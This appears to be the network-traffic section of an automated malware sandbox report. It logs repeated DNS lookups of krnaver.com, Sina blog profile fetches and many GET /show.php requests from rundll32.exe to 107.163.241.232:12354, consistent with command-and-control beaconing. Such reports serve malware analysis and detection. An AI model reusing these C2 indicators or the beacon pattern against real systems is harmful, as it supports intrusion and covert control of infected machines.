                                              Dec 11, 2024 16:25:00.120704889 CET5051553192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:00.259026051 CET53505151.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:05.152249098 CET6360653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:05.314920902 CET53636061.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:10.192047119 CET5770553192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:10.331470966 CET53577051.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:15.104394913 CET5203653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:15.242300034 CET53520361.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:20.135457993 CET5854753192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:20.274451971 CET53585471.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:25.119688034 CET6267153192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:25.257247925 CET53626711.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:30.166443110 CET4939753192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:30.303757906 CET53493971.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:35.120079041 CET5869253192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:35.257730961 CET53586921.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:40.210174084 CET6137253192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:40.351072073 CET53613721.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:45.103955030 CET5623353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:45.244546890 CET53562331.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:50.088627100 CET5399353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:50.228055000 CET53539931.1.1.1192.168.2.4
                                              Dec 11, 2024 16:25:55.088614941 CET6121653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:25:55.226305962 CET53612161.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:00.088588953 CET5628353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:00.225617886 CET53562831.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:05.088643074 CET6537053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:05.226759911 CET53653701.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:10.089994907 CET6066353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:10.227189064 CET53606631.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:15.092192888 CET6169253192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:15.232213020 CET53616921.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:20.087965012 CET5334653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:20.226773977 CET53533461.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:25.089855909 CET6422553192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:25.230489969 CET53642251.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:30.088426113 CET4975753192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:30.227356911 CET53497571.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:35.278353930 CET6300953192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:35.415812969 CET53630091.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:40.088145018 CET5814853192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:40.226210117 CET53581481.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:45.130080938 CET5667653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:45.267359972 CET53566761.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:49.626477957 CET5703753192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:50.088113070 CET5299653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:50.224890947 CET53529961.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:50.331423044 CET53570371.1.1.1192.168.2.4
                                              Dec 11, 2024 16:26:55.088515043 CET5522153192.168.2.41.1.1.1
                                              Dec 11, 2024 16:26:55.227691889 CET53552211.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:00.087887049 CET5306053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:00.224967003 CET53530601.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:05.092292070 CET5008553192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:05.229182959 CET53500851.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:10.095103025 CET5653153192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:10.234644890 CET53565311.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:15.092111111 CET5662853192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:15.228859901 CET53566281.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:20.087919950 CET5459053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:20.225327969 CET53545901.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:25.115286112 CET5419153192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:25.258860111 CET53541911.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:30.088248014 CET5220853192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:30.227421045 CET53522081.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:35.286341906 CET5616853192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:35.424673080 CET53561681.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:40.314431906 CET5434653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:40.483278990 CET53543461.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:45.092597008 CET5513053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:45.229643106 CET53551301.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:50.157186031 CET6026853192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:50.293767929 CET53602681.1.1.1192.168.2.4
                                              Dec 11, 2024 16:27:55.098858118 CET6232253192.168.2.41.1.1.1
                                              Dec 11, 2024 16:27:55.236649036 CET53623221.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:00.099330902 CET5345753192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:00.239818096 CET53534571.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:05.088124990 CET5671053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:05.224874973 CET53567101.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:10.107696056 CET5651053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:10.244606972 CET53565101.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:10.259996891 CET5651053192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:10.398324966 CET53565101.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:15.093828917 CET5331553192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:15.235644102 CET53533151.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:20.088032007 CET5082353192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:20.225198030 CET53508231.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:25.091897011 CET6439653192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:25.231486082 CET53643961.1.1.1192.168.2.4
                                              Dec 11, 2024 16:28:30.196170092 CET5641953192.168.2.41.1.1.1
                                              Dec 11, 2024 16:28:30.332972050 CET53564191.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 11, 2024 16:24:30.774204969 CET192.168.2.41.1.1.10x66f8Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:24:35.091752052 CET192.168.2.41.1.1.10x8412Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:24:37.529467106 CET192.168.2.41.1.1.10xcdc0Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:24:40.168365002 CET192.168.2.41.1.1.10x9e73Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:24:45.619990110 CET192.168.2.41.1.1.10xc194Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:24:50.105223894 CET192.168.2.41.1.1.10xd2d1Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:24:55.091144085 CET192.168.2.41.1.1.10x357dStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:00.120704889 CET192.168.2.41.1.1.10x87edStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:05.152249098 CET192.168.2.41.1.1.10xe022Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:10.192047119 CET192.168.2.41.1.1.10xacbdStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:15.104394913 CET192.168.2.41.1.1.10x7d59Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:20.135457993 CET192.168.2.41.1.1.10xf85eStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:25.119688034 CET192.168.2.41.1.1.10x5e53Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:30.166443110 CET192.168.2.41.1.1.10xf990Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:35.120079041 CET192.168.2.41.1.1.10x3c47Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:40.210174084 CET192.168.2.41.1.1.10x7fbbStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:45.103955030 CET192.168.2.41.1.1.10x3eacStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:50.088627100 CET192.168.2.41.1.1.10x8965Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:25:55.088614941 CET192.168.2.41.1.1.10x19abStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:00.088588953 CET192.168.2.41.1.1.10x4601Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:05.088643074 CET192.168.2.41.1.1.10xfa84Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:10.089994907 CET192.168.2.41.1.1.10xfb70Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:15.092192888 CET192.168.2.41.1.1.10x682aStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:20.087965012 CET192.168.2.41.1.1.10xfc11Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:25.089855909 CET192.168.2.41.1.1.10x956aStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:30.088426113 CET192.168.2.41.1.1.10xbd4bStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:35.278353930 CET192.168.2.41.1.1.10x461cStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:40.088145018 CET192.168.2.41.1.1.10x5d58Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:45.130080938 CET192.168.2.41.1.1.10x9997Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:49.626477957 CET192.168.2.41.1.1.10x4484Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:50.088113070 CET192.168.2.41.1.1.10x5941Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:55.088515043 CET192.168.2.41.1.1.10x96e8Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:00.087887049 CET192.168.2.41.1.1.10x409cStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:05.092292070 CET192.168.2.41.1.1.10x1926Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:10.095103025 CET192.168.2.41.1.1.10x240Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:15.092111111 CET192.168.2.41.1.1.10x3bb6Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:20.087919950 CET192.168.2.41.1.1.10xb6caStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:25.115286112 CET192.168.2.41.1.1.10xbbb2Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:30.088248014 CET192.168.2.41.1.1.10xa87fStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:35.286341906 CET192.168.2.41.1.1.10xf3bdStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:40.314431906 CET192.168.2.41.1.1.10x52c4Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:45.092597008 CET192.168.2.41.1.1.10x6ac1Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:50.157186031 CET192.168.2.41.1.1.10xfbd1Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:27:55.098858118 CET192.168.2.41.1.1.10x9043Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:00.099330902 CET192.168.2.41.1.1.10x46eStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:05.088124990 CET192.168.2.41.1.1.10xab2eStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:10.107696056 CET192.168.2.41.1.1.10xd719Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:10.259996891 CET192.168.2.41.1.1.10xd719Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:15.093828917 CET192.168.2.41.1.1.10x2aedStandard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:20.088032007 CET192.168.2.41.1.1.10xee39Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:25.091897011 CET192.168.2.41.1.1.10x3b78Standard query (0)krnaver.comA (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:28:30.196170092 CET192.168.2.41.1.1.10xb6dStandard query (0)krnaver.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 11, 2024 16:24:37.668656111 CET1.1.1.1192.168.2.40xcdc0No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                              Dec 11, 2024 16:24:37.668656111 CET1.1.1.1192.168.2.40xcdc0No error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false
                                              Dec 11, 2024 16:26:50.331423044 CET1.1.1.1192.168.2.40x4484No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                              Dec 11, 2024 16:26:50.331423044 CET1.1.1.1192.168.2.40x4484No error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • blog.sina.com.cn
                                              • 107.163.241.232:12354

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449753107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:34.035761118 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449754107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:34.045511961 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449771107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:36.399374008 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449772107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:36.399468899 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449780202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:37.807125092 CET118OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Dec 11, 2024 16:24:39.390270948 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449788107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:38.640598059 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449790107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:38.764035940 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449805107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:40.412738085 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449807107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:40.525108099 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449808202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:40.528368950 CET118OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Dec 11, 2024 16:24:42.096566916 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449823107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:42.721698999 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449826107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:42.859102011 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449842107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:44.435282946 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449844202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:44.543629885 CET118OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Dec 11, 2024 16:24:46.116806984 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:45 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449845107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:44.546982050 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449860107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:46.678975105 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449861107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:46.799393892 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449873107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:48.632174015 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449876107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:48.760859013 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449883202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:49.443798065 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:24:51.010355949 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
